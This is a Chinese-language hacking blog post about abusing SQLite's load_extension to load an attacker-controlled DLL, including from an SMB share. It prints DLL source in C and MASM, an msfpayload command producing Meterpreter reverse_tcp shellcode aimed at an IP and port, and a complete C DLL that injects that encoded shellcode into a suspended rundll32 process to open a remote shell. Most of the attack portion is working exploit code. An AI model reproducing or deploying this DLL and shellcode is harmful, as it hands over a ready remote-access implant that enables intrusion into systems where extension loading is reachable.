记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

谈一谈SQLite Load_Extension的妙用

2016-10-12 06:05

什么是load_extension?

这个接口加载一个SQLite扩展库的文件

a1

更多信息:https://www.sqlite.org/c3ref/load_extension.html

你可以用这个函数来加载一个SQLite扩展。但是在默认情况下sqlite3_enable_load_extension()默认是关闭的,以防止这种情况的SQL注入攻击。

你可以从这里了解更多:https://www.sqlite.org/c3ref/enable_load_extension.html

语法:

a2

这个路径const char *zFile可以是一个SMB共享

自定义DLL

我们可以定义自己的恶意DLL文件并执行我们自己的恶意代码。

#include <windows.h>
/*
 * Author: @OsandaMalith 
 * Website: http://osandamalith.com
 */
BOOL WINAPI DllMain (
 HANDLE hinstDLL,
 DWORD fdwReason,
 LPVOID lpvReserved)
{
 switch (fdwReason)
 {
 case DLL_PROCESS_ATTACH: 
 MessageBox(0, "You got pwned", "@OsandaMalith", MB_OK | MB_ICONERROR);
 break;
 case DLL_THREAD_ATTACH:
 case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
 MessageBox(0, "Unloading DLL", "@OsandaMalith", MB_OK | MB_ICONWARNING);
 break;
 }
 return TRUE;
}
 
int hello() {
 MessageBox(0, "Just Kidding :)", "@OsandaMalith", MB_OK | MB_ICONINFORMATION);
}

也可以使用MASM32的代码,这是个体积非常小的DLL

.386

; Author: @OsandaMalith 
 ; Website: http://osandamalith.com

.MODEL flat,stdcall

OPTION CASEMAP:NONE

Include windows.inc
Include user32.inc
Include kernel32.inc

IncludeLib user32.lib
IncludeLib kernel32.lib

.DATA

AppName db "DLL Skeleton",0
HelloMsg db "Just Kidding :)",0
LoadMsg db "You got Pwned!",0
UnloadMsg db "The DLL is unloaded",0
ThreadCreated db "A thread is created in this process",0
ThreadDestroyed db "A thread is destroyed in this process",0

.code
DllEntry proc hInstance:HINSTANCE, reason:DWORD, reserved1:DWORD
 .if reason==DLL_PROCESS_ATTACH
 invoke MessageBox,NULL,addr LoadMsg,addr AppName,MB_OK + MB_ICONERROR + MB_RTLREADING
 .elseif reason==DLL_PROCESS_DETACH
 invoke MessageBox,NULL,addr UnloadMsg,addr AppName,MB_OK + MB_ICONWARNING
 .elseif reason==DLL_THREAD_ATTACH
 invoke MessageBox,NULL,addr ThreadCreated,addr AppName,MB_OK
 .else 
 invoke MessageBox,NULL,addr ThreadDestroyed,addr AppName,MB_OK
 .endif
 mov eax,TRUE
 ret
DllEntry Endp

hello proc
 invoke MessageBox,NULL,addr HelloMsg,addr AppName,MB_OK + MB_ICONINFORMATION + MB_RTLREADING
 ret 
hello endp

End DllEntry

a4

HTML + DLL

你可以通过hasherezade来检查drop_and_run项目

https://github.com/hasherezade/snippets/tree/master/drop_and_run的demo.html是我们的嵌入式HTML注释中的DLL文件。因此,我们可以嵌入我们的恶意DLL代码到一个HTML文件中

a5

a6

Shellcode + GameOver

我们可以用自己的DLL来编写shellcode,在这个例子中我使用的是Meterpreter反向TCP shellcode。

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=4444 R| msfencode -e x86/shikata_ga_nai -b '\x00\x0A\x0D' -t c

#include <windows.h>
/*
 * Website: http://osandamalith.com
 */
#define SCSIZE 2048
unsigned char code[SCSIZE] = 
"\xb8\xdc\x16\x51\xba\xdb\xd0\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x49\x83\xc5\x04\x31\x45\x10\x03\x45\x10\x3e\xe3\xad\x52\x37"
"\x0c\x4e\xa3\x27\x84\xab\x92\x75\xf2\xb8\x87\x49\x70\xec\x2b"
"\x22\xd4\x05\xbf\x46\xf1\x2a\x08\xec\x27\x04\x89\xc1\xe7\xca"
"\x49\x40\x94\x10\x9e\xa2\xa5\xda\xd3\xa3\xe2\x07\x1b\xf1\xbb"
"\x4c\x8e\xe5\xc8\x11\x13\x04\x1f\x1e\x2b\x7e\x1a\xe1\xd8\x34"
"\x25\x32\x70\x43\x6d\xaa\xfa\x0b\x4e\xcb\x2f\x48\xb2\x82\x44"
"\xba\x40\x15\x8d\xf3\xa9\x27\xf1\x5f\x94\x87\xfc\x9e\xd0\x20"
"\x1f\xd5\x2a\x53\xa2\xed\xe8\x29\x78\x78\xed\x8a\x0b\xda\xd5"
"\x2b\xdf\xbc\x9e\x20\x94\xcb\xf9\x24\x2b\x18\x72\x50\xa0\x9f"
"\x55\xd0\xf2\xbb\x71\xb8\xa1\xa2\x20\x64\x07\xdb\x33\xc0\xf8"
"\x79\x3f\xe3\xed\xfb\x62\x6c\xc1\x31\x9d\x6c\x4d\x42\xee\x5e"
"\xd2\xf8\x78\xd3\x9b\x26\x7e\x14\xb6\x9e\x10\xeb\x39\xde\x39"
"\x28\x6d\x8e\x51\x99\x0e\x45\xa2\x26\xdb\xc9\xf2\x88\xb4\xa9"
"\xa2\x68\x65\x41\xa9\x66\x5a\x71\xd2\xac\xf3\x1b\x28\x27\x3c"
"\x73\x32\xd1\xd4\x81\x33\x0c\x79\x0c\xd5\x44\x91\x58\x4d\xf1"
"\x08\xc1\x05\x60\xd4\xdc\x63\xa2\x5e\xd2\x94\x6d\x97\x9f\x86"
"\x1a\x57\xea\xf5\x8d\x68\xc1\x90\x31\xfd\xed\x32\x65\x69\xef"
"\x63\x41\x36\x10\x46\xd9\xff\x84\x29\xb6\xff\x48\xaa\x46\x56"
"\x02\xaa\x2e\x0e\x76\xf9\x4b\x51\xa3\x6d\xc0\xc4\x4b\xc4\xb4"
"\x4f\x23\xea\xe3\xb8\xec\x15\xc6\x38\xd1\xc3\x2f\xbf\x23\x66"
"\x5c\x03";
 
void inline_bzero(void *p, size_t l)
{
 
 BYTE *q = (BYTE *)p;
 size_t x = 0;
 for (x = 0; x < l; x++)
 *(q++) = 0x00;
}
 
void boom(void);
 
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
 switch (dwReason)
 {
 case DLL_PROCESS_ATTACH:
 boom();
 break;
 
 case DLL_PROCESS_DETACH:
 break;
 
 case DLL_THREAD_ATTACH:
 break;
 
 case DLL_THREAD_DETACH:
 break;
 }
 return TRUE;
}
 
void boom(void) {
 int error;
 PROCESS_INFORMATION pi;
 STARTUPINFO si;
 CONTEXT ctx;
 DWORD prot;
 LPVOID ep;
 
 inline_bzero( &si, sizeof( si ));
 si.cb = sizeof(si);
 
 if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
 ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
 GetThreadContext(pi.hThread, &ctx);
 
 ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 
 WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
 
#ifdef _WIN64
 ctx.Rip = (DWORD64)ep;
#else
 ctx.Eip = (DWORD)ep;
#endif
 
 SetThreadContext(pi.hThread,&ctx);
 
 ResumeThread(pi.hThread);
 CloseHandle(pi.hThread);
 CloseHandle(pi.hProcess);
 }
 ExitThread(0);
}

a7

参考

  • https://www.sqlite.org/c3ref/load_extension.html
  • https://www.sqlite.org/c3ref/enable_load_extension.html
  • https://github.com/hasherezade/snippets/tree/master/drop_and_run
  • https://osandamalith.com/2016/10/10/fun-with-sqlite-load_extension/

未经允许不得转载: » 谈一谈SQLite Load_Extension的妙用

知识来源: www.mottoin.com/90266.html

阅读:132139 | 评论:0 | 标签:网络安全 DLL GameOver html load_extension Meterpreter shellcode

想收藏或者和大家分享这篇好文章→复制链接地址

“谈一谈SQLite Load_Extension的妙用”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词